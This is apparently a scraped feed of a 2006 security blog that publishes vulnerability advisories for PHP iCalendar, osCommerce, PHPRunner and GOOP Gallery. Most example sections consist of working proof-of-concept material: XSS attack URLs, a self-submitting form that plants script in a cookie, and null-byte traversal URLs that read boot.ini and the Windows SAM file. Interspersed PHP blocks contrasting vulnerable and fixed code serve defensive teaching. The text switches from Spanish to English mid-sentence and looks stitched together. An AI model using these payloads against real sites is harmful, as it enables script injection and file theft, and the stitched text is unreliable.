32500 (http://osvdb.org/displayvuln.php?osvdb_id=32500)
Securitytracker: 1017449 (http://securitytracker.com/alerts/2006/Dec/1017449.html)
Secunia: SA23499 (http://secunia.com/advisories/23499/)
BID: 21792 (http://www.securityfocus.com/bid/21792/)
#####################################################


PHP icalendar contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the application does
not validate multiple params upon submission to multiple scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.

######################
versions
######################

All of these versions have been tested.
Possibly other versions are vulnerable too.

PHP iCalendar 2.23 rc1
PHP iCalendar 2.22
PHP icalendar 2.0 Beta
PHP iCalendar 1.1

######################
Solution:
######################

No solution was available at this time!!

##################
Time Line
##################

Discovered: 20-12-2006
Vendor notify: 25-12-2006
Vendor response:
Disclosure: 27-12-2006

###################
EXAMPLES & PoC
###################

http://localhost/phpicalendar/day.php?cal=
all_calendars_combined971&getdate=
20061225"><script>alert()</script>

http://localhost/phpicalendar/month.php?cal=
all_calendars_combined971&getdate=20061225
"><script>alert()</script>

http://localhost/phpicalendar/year.php?cal=
all_calendars_combined971&getdate=20061225
"><script>alert()</script>

http://localhost/phpicalendar/week.php?cal=
all_calendars_combined971&getdate=20061225
"><script>alert()</script>

http://localhost/phpicalendar/day.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain)
%3C/script%3E&getdate=20061225&cal%5B%5D=
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/month.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain
)%3C/script%3E&getdate=20061225&cal%5B%5D
=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/year.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain)
%3C/script%3E&getdate=20061225&cal%5B%5D=
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/week.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain)
%3C/script%3E&getdate=20061225&cal%5B%5D=
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


----


http://localhost/phpicalendar/search.php?cpath=
&cal=Home%2CUS%2BHolidays%2CWork&getdate=
19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15


http://localhost/phpicalendar/search.php?cpath=
"><script>alert()</script>&
cal=Home%2CUS%2BHolidays2CWork&getdate=
19700102&query=ss&submit.x=11&submit.y=12



http://localhost/phpicalendar/search.php?cpath=&
cal=Home%2CUS%2BHolidays%2CWork&getdate=19700102
"><script>alert()</script>&
query=ss&submit.x=11&submit.y=12

----

http://localhost/phpicalendar/rss/index.php?cal=Home
,US+Holidays,Work&getdate=20061225"><
script>alert()</script>

http://localhost/phpicalendar/print.php?cal=Home,
US+Holidays,Work&getdate=20061225%22%3E%3Cscr
ipt%3Ealert()%3C/script%3E&printview=day

################################
Proof of concept for preferences
################################

Multiple param XSS in preferences.php

Use the proof and modify some params to create
an evil cookie before submitting :)

http://localhost/phpicalendar/preferences.php?cal=
Home,US+Holidays,Work&getdate=20061227%22%3E%3
Cscript%3Ealert()%3C/script%3E


<html>
<head>
<title>PHP icalendar XSS in preferences.php PoC</title>
</head>
<body>
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP
icalendar</a> &lt;= 2.23 rc1 preferences.php XSS Proof Of concept By <a
href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p>
<p>Modify the target host, by default http://localhost/</p>

<form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input type='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input type='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input type='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='cpath' style='width: 80%' /><br>
cookie_view: <input type='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input type='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input type='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input type='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input type='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='unset' style='width: 80%' /><br>
set: <input type='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form><hr />
<textarea style='width: 80%; height: 50%;'>
<form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input type='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input type='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input type='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='cpath' style='width: 80%' /><br>

cookie_view: <input type='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input type='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input type='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input type='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input type='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='unset' style='width: 80%' /><br>
set: <input type='text'
value='&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form>
&lt;script&gt;
document.forms[0].submit()
&lt;/script&gt;
</textarea>
</body>
</html>


######################## €nd #####################

Thnx to Estrella for being my light.

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....<div class="blogger-post-footer">
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1166730568384086012006-12-21T11:25:00.000-08:002006-12-23T03:03:12.870-08:00Indexacion de vulnerabilidades########################################<br />Indexacion de algunas vulnerabilidades<br />########################################<br /><br /><div align="justify">En los últimos años, después de profundizar en la forma, en que<br />las nuevas vulnerabilidades son descubiertas y publicadas, desde<br />el punto de vista de aquel que las descubre, y las publica.<br /><br />Cual es en si el proceso que se sigue, desde que esa vulnerabilidad<br />es descubierta, hasta que es publicada por las numerosas listas de<br />seguridad, cómo son añadidas a las bases de datos de esas listas,<br />cómo se documentan, y por ultimo como son publicadas, se me<br />ocurren varias consideraciones a tener en cuenta…<br /><br />Se ha intentado durante mucho tiempo una estandarización,<br />para poder clasificar los archivos de fallas, de una manera<br />en la cual fuese fácil reconocerlas (causa del mismo), saber<br />el tipo de ataque que puede llevarse a cabo (Impacto) Y su<br />posible mitigación o solución.<br /><br />Me gustaría hacer un inciso sobre todo en la forma en la que<br />se suelen tratar una serie de vulnerabilidades, las cuales<br />suelen ser explotables a través de la URL o en si digamos en<br />la modificación de los valores de alguna de las variables<br />o parámetros de la URL.<br /><br />Las vulnerabilidades sobre las que me gustaría hacer un<br />comentario son las siguientes:<br /><br />Cross-site Scripting, SQL injection, traversal arbitrary file access<br />y alguno que me dejo en el tintero.<br /><br /><br />Todos estos agujeros suelen ser explotados a través de la URL, <br />y casi todos hacen uso de las diferentes variables, pasadas <br />por la URL de una página a otra en las peticiones 
POST or GET<br />of a website.<br /><br />Take, for example, a URL with several parameters, one of which <br />is vulnerable...<br /><br />http://[victim]/folder/file.php?var1=value1&var2=[XSS-CODE]<br />&var3=value3<br /><br />This vulnerability would most likely be named...<br /><br />[Affected product] + [Variable name] + [Flaw]<br /><br />So we would say that our product is vulnerable to a cross-site <br />scripting bug in the variable var2.<br /><br />When this vulnerability reaches the security lists, they echo it and,<br />if the discoverer did not specify one, add the affected file, so the<br />description of our vulnerability would say that product XXX is<br />vulnerable to cross-site scripting in the variable var2 when it is<br />sent to the file 'file.php'.<br /><br />What if that variable is not defined in that page? What if it comes<br />from another page we POSTed to, or lives in another file that is<br />included by the page that is supposedly vulnerable?<br /><br />We would surely go mad trying to locate the flaw, and we would have<br />to look at many more files than we actually need in order to pin that<br />vulnerability on one particular call to the affected variable.<br /><br />The developer would surely find it harder to locate the exact error,<br />because by naming a file in which the variable supposedly fails we<br />are giving them incorrect information about where the vulnerability<br />really lies.<br /><br />Take as an example a PHP-NUKE style portal where, in the URL below,<br />the first variable calls a module and the second one comes from the<br />module that was called.<br /><br />http://[PHP-NUKE]/modules.php?name=News&new_topic=1<br /><br />If the second variable were vulnerable, the lists would likewise<br />describe it as 'the variable new_topic is vulnerable when it is sent<br />to the file modules.php', but the vulnerability could (and almost<br />always does) come from the file News.php located in PHP-NUKE's<br />modules directory.<br /><br />The developer would probably fix that variable in the page named in<br />the report, but the same variable would probably remain vulnerable<br />from another point of the portal, because it was not corrected<br />directly where that variable or parameter is initialised, so that<br />one vulnerability could in fact be split in two.<br /><br />If the security lists say that the variable new_topic is vulnerable<br />to cross-site scripting when sent to modules.php, and that variable<br />is defined in the file news.php...<br />would it not be more correct to say that the variable new_topic is<br />vulnerable at both points rather than only at the first?<br /><br />This kind of "error" when documenting vulnerabilities suggests that<br />many vulnerabilities of the type described may be listed incorrectly,<br />or may mislead, because most of the time the definition itself is<br />wrong.<br /><br /><br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<br /></div><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
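An added illustration of the point made in the post above; this is example code written for this page, not PHP-Nuke's source. It models two entry points that reach one module, where the module (not the dispatcher) is the place that reads and echoes new_topic. The function names, the second entry point and the HTML produced are assumptions.

```php
<?php
// Added example, not PHP-Nuke's own code. Two entry points reach one module,
// and the module (not the dispatcher) is where new_topic is read and echoed.
// Function names, the second entry point and the markup are assumptions.

// Equivalent of modules/News/index.php: the parameter is initialised and used here.
function render_news_vulnerable(array $get): string
{
    $new_topic = isset($get['new_topic']) ? $get['new_topic'] : '';
    // The real sink: the value is reflected into an attribute with no encoding.
    return '<a href="modules.php?name=News&new_topic=' . $new_topic . '">topic</a>';
}

// Same module with the fix applied where the value is consumed, so every
// caller is covered no matter which file the advisory happened to name.
function render_news_fixed(array $get): string
{
    $new_topic = isset($get['new_topic']) ? $get['new_topic'] : '';
    $safe = htmlspecialchars($new_topic, ENT_QUOTES, 'UTF-8');
    return '<a href="modules.php?name=News&amp;new_topic=' . $safe . '">topic</a>';
}

// Equivalent of modules.php: the "fix it in the reported file" approach, which
// only encodes the value when the request arrives through this dispatcher.
function modules_php(array $get, callable $module): string
{
    if (isset($get['new_topic'])) {
        $get['new_topic'] = htmlspecialchars($get['new_topic'], ENT_QUOTES, 'UTF-8');
    }
    return $module($get);
}

// A second entry point (say, a front page that embeds the News module)
// that the dispatcher-only fix never sees.
function index_php(array $get, callable $module): string
{
    return $module($get);
}

// Constructed request: a value that closes the href attribute.
$request = ['name' => 'News', 'new_topic' => '1"><script>alert(1)</script>'];

$cases = [
    'modules.php -> vulnerable module (dispatcher fix applied)'  => modules_php($request, 'render_news_vulnerable'),
    'index.php   -> vulnerable module (dispatcher fix bypassed)' => index_php($request, 'render_news_vulnerable'),
    'index.php   -> fixed module (encoded at point of use)'      => index_php($request, 'render_news_fixed'),
];

foreach ($cases as $label => $html) {
    $verdict = strpos($html, '<script>') !== false ? 'INJECTED' : 'safe';
    printf("%-60s %s\n    %s\n", $label, $verdict, $html);
}
```

Run it with `php naming.php`: the first case is safe only because the request happened to go through the dispatcher; the second shows the same payload landing through the other entry point; the third shows that encoding at the point of use covers both, which is why the advisory should name the module file.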
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1165482267378662582006-12-07T00:58:00.000-08:002006-12-08T16:15:41.610-08:00Oscommerce traversal arbitrary file access############################################<br />Oscommerce traversal arbitrary file access<br />Vendor:http://www.oscommerce.com/about/news,125<br />Advisory:http://lostmon.blogspot.com/2006/12<br />/oscommerce-traversal-arbitrary-file.html<br />Vendor notify:NO Exploit available: YES<br />Securitytracker:<a href="http://securitytracker.com/id?1017353" target="_BLANK">1017353</a><br />BID:<a href="http://www.securityfocus.com/bid/21477" target="_BLANK">21477</a><br />###########################################<br /><br />osCommerce contains a flaw that allows remote directory traversal<br />and arbitrary file access. The flaw exists because the application<br />does not validate the 'filter' variable upon submission to the<br />admin/templates_boxes_layout.php script. This could allow a<br />remote authenticated administrator to create a specially<br />crafted URL containing '../' directory traversal sequences<br />to view files on the target system with the privileges<br />of the web server process.<br /><br /><br /><br />####################<br />versions <br />####################<br /><br />Oscommerce 3.0a3<br /><br /><br />###################<br />SOLUTION<br />###################<br /><br />No solution was available at this time.<br /><br /><br />################<br />timeline<br />################<br /><br />Discovered:11-11-2006<br />vendor notify:------<br />vendor response:<br />disclosure:07-12-2006<br /><br />#################<br />Examples<br />#################<br /><br />######################<br />traversal file access<br />######################<br /><br />When we try to open<br /><br />http://localhost/oscommerce/admin/templates_boxes_layout.php?<br />set=boxes&filter=[SOME WORD]&lID=27<br /><br />the application discloses the full installation path and<br />returns this error:<br /><br /> Warning: require(includes/templates/[SOME WORD].php) [function.require]: <br /> failed to open stream: No such file or directory in C:\AppServ\www\oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13<br /><br />Fatal error: require() [function.require]: Failed opening required <br />'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')<br />in C:\AppServ\www\oscommerce\admin\templates\pages\templates_<br />boxes_layout.php on line 13<br /><br />The application appends the .php extension to our [SOME WORD]<br />and looks for that file in a folder inside the web root, so we<br />can make it include any PHP file located on the web server,<br />and that file is then executed (local file inclusion):<br /><br />http://[victim]/admin/templates_boxes_layout.php?<br />set=boxes&filter=../../our_evil_php_file&lID=27<br /><br />To read a file outside the web root, or a file without a .php<br />extension, we append a null byte so that the path is truncated<br />before the '.php' suffix (PHP versions before 5.3.4 stopped at<br />the first NUL byte in a file name):<br /><br />&filter=../../../../file.extension%00 for example to look for boot.ini<br />on a Windows system<br /><br />http://localhost/oscommerce/admin/templates_boxes_layout.php?<br />set=boxes&filter=../../../../BOOT.INI%00&lID=27<br /><br />http://localhost/oscommerce/admin/templates_boxes_layout.php?<br />set=content&filter=../../../../windows/repair/sam%00&lID=27<br /><br />#####################<br />Cross site scripting<br />#####################<br /><br />http://localhost/oscommerce/admin/modules.php?set=shipping<br />%22%3E%3Cscript%3Ealert('xss')%3C/script%3E<br /><br />http://localhost/definitiva/admin/customers.php?selected_box=customers<br />%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E<br /><br />http://localhost/oscommerce/admin/languages_definitions.php?lID=1<br />%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E<br /><br />http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT<br />%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product<br /><br /><br />######################## €nd #####################<br /><br />Thanks to Estrella for being my light.<br /><br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br /><br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
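An added example for the traversal above; it is not osCommerce code. The vulnerable path builder reproduces the pattern implied by the require() error quoted in the advisory (includes/templates/&lt;filter&gt;.php), and the hardened builder is one way to fix it. The template directory, the template names and the function names are assumptions.

```php
<?php
// Added example, not osCommerce code. The vulnerable builder reproduces the
// pattern implied by the require() error in the advisory; the hardened builder
// is one way to fix it. The template directory, the template names and the
// function names are assumptions for illustration.

// Vulnerable: the filter value is concatenated straight into the require() path.
// "../../x" walks out of includes/templates/, and on PHP before 5.3.4 a %00 in
// the value truncated the path so the appended ".php" was ignored.
function template_path_vulnerable(string $filter): string
{
    return 'includes/templates/' . $filter . '.php';
}

// Hardened: accept only a name from a fixed list, refuse anything that is not a
// plain token (no slashes, dots or NUL bytes), and confirm that the resolved
// path still lies inside the template directory.
function template_path_fixed(string $filter, string $base_dir, array $allowed): ?string
{
    if (!in_array($filter, $allowed, true)) {
        return null;                                   // not a known template
    }
    if (!preg_match('/\A[a-z0-9_]+\z/', $filter)) {
        return null;                                   // defence in depth on the token
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . $filter . '.php');
    if ($base === false || $path === false) {
        return null;                                   // directory or file missing
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                   // escaped the template directory
    }
    return $path;
}

// Demonstration against a throwaway template directory created on the fly.
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_' . uniqid();
mkdir($tmp);
file_put_contents($tmp . DIRECTORY_SEPARATOR . 'default.php', "<?php echo 'default';\n");

$allowed = ['default', 'modern'];                      // 'modern' is allowed but not installed
$inputs  = ['default', 'modern', '../../../../boot.ini', "../../../../boot.ini\0", 'evil'];

foreach ($inputs as $in) {
    $shown = str_replace("\0", '%00', $in);
    $v = str_replace("\0", '%00', template_path_vulnerable($in));
    $f = template_path_fixed($in, $tmp, $allowed);
    printf("%-30s vulnerable=%-42s fixed=%s\n", $shown, $v, $f ?? 'REJECTED');
}

unlink($tmp . DIRECTORY_SEPARATOR . 'default.php');
rmdir($tmp);
```

Run it with `php lfi_check.php`: only `default` resolves; the traversal strings and the unknown name are rejected before any filesystem call. The allow-list already makes the realpath check redundant for this input set, but it catches a misconfigured list (an entry containing a slash) at no cost. Note that PHP 5.3.4 and later reject a NUL byte in a filesystem path outright, so the %00 variant of the exploit only works on older interpreters; the inclusion of arbitrary .php files does not depend on it.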
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1163278279097180302006-11-20T12:47:00.000-08:002007-03-24T12:22:29.563-07:00Oscommerce Multiple XSS in admin section##########################################<br />Oscommerce Multiple XSS in admin section.<br />Vendor url:http://www.oscommerce.com<br />Advisory:http://lostmon.blogspot.com/2006/11/<br />oscommerce-multiple-xss-in-admin.html<br />Vendor notify:YES Exploit available: YES<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=33212" target="_BLANK">33212</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33213" target="_BLANK">33213</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33214" target="_BLANK">33214</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33216" target="_BLANK">33216</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33217" target="_BLANK">33217</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=33218" target="_BLANK">33218</a><br />Securitytracker:<a href="http://securitytracker.com/id?1017269" target="_BLANK">1017269</a><br />Secunia:<a href="http://secunia.com/advisories/22275/" target="_BLANK">SA22275</a><br /><br />##########################################<br /><br />osCommerce contains a flaw that allows a remote cross-site<br />scripting attack. The flaw exists because the application does<br />not validate multiple parameters upon submission to multiple scripts<br />in the /admin folder. This could allow a user to create a specially<br />crafted URL that would execute arbitrary code in a user's browser<br />within the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br /><br />####################<br />versions<br />####################<br /><br />osCommerce 2.2ms2-060817<br /><br /><br />###################<br />SOLUTION<br />###################<br /><br />No solution was available at this time.<br /><br /><br />################<br />timeline<br />################<br /><br />Discovered:29-10-2006<br />vendor notify:20-11-2006<br />vendor response:<br />disclosure:21-11-2006<br /><br />#################<br />Examples<br />#################<br /><br />If the server has authentication enabled,<br />you need to log in before exploiting<br />any of these flaws.<br /><br />-------------------------------<br />gID param in configuration.php<br />-------------------------------<br /><br />http://[Victim]/catalog/admin/configuration.php?<br />gID=1">[XSS-CODE]&cID=3<br /><br />--------------------------<br />set param in modules.php<br />--------------------------<br /><br />http://localhost/catalog/admin/modules.php?selected_box=modules<br />&set=payment">[XSS-CODE]&osCAdminID=034e6def71e10f0ca58029e93fd361e5<br /><br />http://localhost/catalog/admin/modules.php?set=payment<br />">[XSS-CODE]&module=pm2checkout<br /><br />http://localhost/catalog/admin/modules.php?set=ordertotal<br />&module=ot_loworderfee">[XSS-CODE]&action=edit<br /><br />--------------------------------------------------<br />option_order_by, value_page, option_page, products<br />_options_name in products_attributes.php<br />--------------------------------------------------<br /><br />http://[Victim]/catalog/admin/products_attributes.php?<br />action=update_option&option_id=1&option_order_by="><br />[XSS-CODE]&products_options_id&option_page=1<br /><br />http://[Victim]/definitiva/admin/products_attributes.php?<br />option_order_by=products_options_id&value_page=2">[XSS-CODE]<br /><br />http://[Victim]/definitiva/admin/products_attributes.php?<br />option_page=1&option_order_by=products_options_name">[XSS-CODE]<br /><br />http://[Victim]/definitiva/admin/products_attributes.php?<br />action=update_option&option_id=1&option_order_by=products<br />_options_id&option_page=1">[XSS-CODE]<br /><br />http://[Victim]/catalog/admin/products_attributes.php?<br />action=update_option&option_id=1&option_order_by=products<br />_options_id&option_page=1">[XSS-CODE]<br /><br />----------------------------------------------------<br />lID param in languages.php<br />---------------------------------------------<br /><br /><br />http://localhost/definitiva/admin/languages.php?page=1&<br />lID=3">[XSS-CODE]&action=new<br /><br />-------------------------------<br />selected_box, cID in customers.php<br />-------------------------------<br /><br />http://localhost/definitiva/admin/customers.php?page=1<br />&cID=1[XSS-CODE]&action=edit<br /><br />http://[Victim]/catalog/admin/customers.php?selected_box=<br />customers">[XSS-CODE]<br /><br />-------------------------------<br />spage, zID, sID in geo_zones.php<br />-------------------------------<br /><br />http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&<br />action=list&spage=1">[XSS-CODE]&sID=1&saction=edit<br /><br />http://localhost/definitiva/admin/geo_zones.php?zpage=1&<br />zID=2">[XSS-CODE]&action=list&spage=1&sID=2&saction=edit<br /><br />http://localhost/definitiva/admin/geo_zones.php?zpage=1<br />&zID=1&action=list&spage=1&sID=1">[XSS-CODE]&saction=new<br /><br />######################## €nd #####################<br /><br />Thanks to Estrella for being my light.<br /><br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1163446706547409062006-11-13T11:03:00.000-08:002006-11-20T10:20:38.506-08:00PHPRunner database credentials disclosure##########################################<br />PHPRunner database credentials disclosure<br />Vendor url:http://www.xlinesoft.com/phprunner/<br />Advisory:http://lostmon.blogspot.com/2006/11/<br />phprunner-database-credentials.html<br />Vendor notify:yes exploit available:yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=30363" target="_BLANK">30363</a><br />Securitytracker:<a href="http://securitytracker.com/id?1017218" target="_BLANK">1017218</a><br />Secunia:<a href="http://secunia.com/advisories/22863/" target="_BLANK">SA22863</a><br />BID:<a href="http://www.securityfocus.com/bid/21054" target="_BLANK">21054</a><br />##########################################<br /><br /><br /><br />Description:<br /><br />PHPRunner builds a visually appealing web interface<br />for any local or remote MySQL, MS Access, SQL Server<br />and Oracle database. Your web site visitors will be<br />able to easily search, add, edit, delete and export<br />data in your database. Advanced security options allow<br />you to build password-protected members-only web sites<br />easily. PHPRunner is simple to learn, so you can build<br />your first project in just fifteen minutes.<br /><br />Vulnerability:<br /><br />PHPRunner contains a flaw that allows local users<br />to view all the credentials PHPRunner stores for its work.<br />The flaw exists because the application stores the<br />database server, database names, users and passwords<br />in plain text in a file located in the Windows folder.<br />A local user can open \windows\PHPRunner.ini directly<br />and obtain all of this information. The Windows folder<br />is readable by every local account by default, so no<br />elevated privileges are needed.<br /><br />versions<br /><br />This was tested on version 3.1<br /><br />solution:<br /><br />No solution was available at this time.<br /><br />Timeline:<br /><br />Discovered:21-10-2006<br />vendor notify:13-11-2006<br />vendor response:13-11-2006<br />disclosure:13-11-2006<br /><br />example:<br /><br />Open c:\windows\PHPRunner.ini<br /><br /><br /><br />######################## €nd #####################<br /><br />Thanks to Estrella for being my light.<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1160852052651250262006-10-16T11:49:00.000-07:002006-11-03T10:36:22.993-08:00GOOP Gallery 'image' param Cross-site scripting################################################<br />GOOP Gallery 'image' param Cross-site scripting<br />Vendor url:http://www.webgeneius.com<br />Advisory:http://lostmon.blogspot.com/2006/10/<br />goop-gallery-image-param-cross-site.html<br />Vendor notify: YES Exploit available: YES<br />securitytracker:<a href="http://securitytracker.com/id?1017081" target="_BLANK">1017081</a><br />Secunia: <a href="http://secunia.com/advisories/22258" target="_BLANK">SA22258</a><br />BID:<a href="http://www.securityfocus.com/bid/20554" target="_BLANK">20554</a><br />################################################<br /><br /><br /><br />GOOP Gallery contains a flaw that allows a remote cross-site<br />scripting attack. The flaw exists because the application does<br />not validate the 'image' parameter upon submission to the index.php script.<br />This could allow a user to create a specially crafted URL that<br />would execute arbitrary code in a user's browser within the<br />trust relationship between the browser and the server, leading<br />to a loss of integrity.<br /><br />################<br />Versions<br />################<br /><br />GOOP Gallery 2.0 vulnerable<br />GOOP Gallery 2.0.3 not vulnerable<br /><br />################<br />Solution<br />################<br /><br />Upgrade to GOOP Gallery 2.0.3 as soon as possible.<br /><br />http://webgeneius.com/index.php?mod=blog&id=49<br /><br />Download GG2.0.3:<br />http://webgeneius.com/downloads/gg2.0.3.zip<br /><br />################<br />Timeline<br />################<br /><br />Discovered:09-10-2006<br />Vendor notify:14-10-2006<br />Vendor response:15-10-2006<br />Vendor Fix: 16-10-2006<br />Disclosure: 16-10-2006<br /><br />##############<br />Example<br />##############<br /><br />http://Victim/goopgallery/index.php?next=%BB&gallery=demo+gallery+1<br />&image=Bunny.JPG">[XSS-CODE]<br /><br />http://Victim/goopgallery/index.php?gallery=demo+gallery+1<br />&image=Bunny.JPG">[XSS-CODE]<br /><br />######################## €nd #####################<br /><br />Thanks to Estrella for being my light.<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1159901170281663372006-10-03T11:41:00.000-07:002006-10-20T14:28:39.600-07:00osCommerce multiple Scripts 'page' param XSS###############################################<br />osCommerce multiple Scripts 'page' param XSS<br />Vendor url: http://www.oscommerce.com<br />Vendor Bugtracker:http://www.oscommerce.com/community/bugs,4303<br />Advisory: http://lostmon.blogspot.com/2006/10/<br />oscommerce-multiple-scripts-page-param.html<br />Vendor notify:yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29795" target="_BLANK">29795</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29796" target="_BLANK">29796</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29797" target="_BLANK">29797</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29798" target="_BLANK">29798</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29799" target="_BLANK">29799</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29800" target="_BLANK">29800</a>,<br /><a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29801" target="_BLANK">29801</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29802" target="_BLANK">29802</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29803" target="_BLANK">29803</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29804" target="_BLANK">29804</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29805" target="_BLANK">29805</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29806" target="_BLANK">29806</a>,<br /><a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29807" target="_BLANK">29807</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29808" target="_BLANK">29808</a><br />Securitytracker:<a href="http://securitytracker.com/id?1016979" target="_blank">1016979</a><br />BID:<a href="http://www.securityfocus.com/bid/20343" target="_blank">20343</a><br />Secunia:<a href="http://secunia.com/advisories/22275/" target="_blank">SA22275</a><br />FrSIRT: <a href="http://www.frsirt.com/english/advisories/2006/3917" target="_BLANK">FrSIRT/ADV-2006-3917</a><br />###############################################<br /><br /><br />osCommerce contains a flaw that allows a remote cross-site<br />scripting attack. The flaw exists because the application does<br />not validate the 'page' parameter upon submission to multiple scripts<br />in the /admin folder. This could allow a user to create a specially<br />crafted URL that would execute arbitrary code in a user's browser<br />within the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br />The same situation occurs in 'admin/geo_zones.php', but with<br />the parameter 'zpage'.<br /><br /><br /><br />####################<br />VERSIONS<br />####################<br /><br />osCommerce 2.2 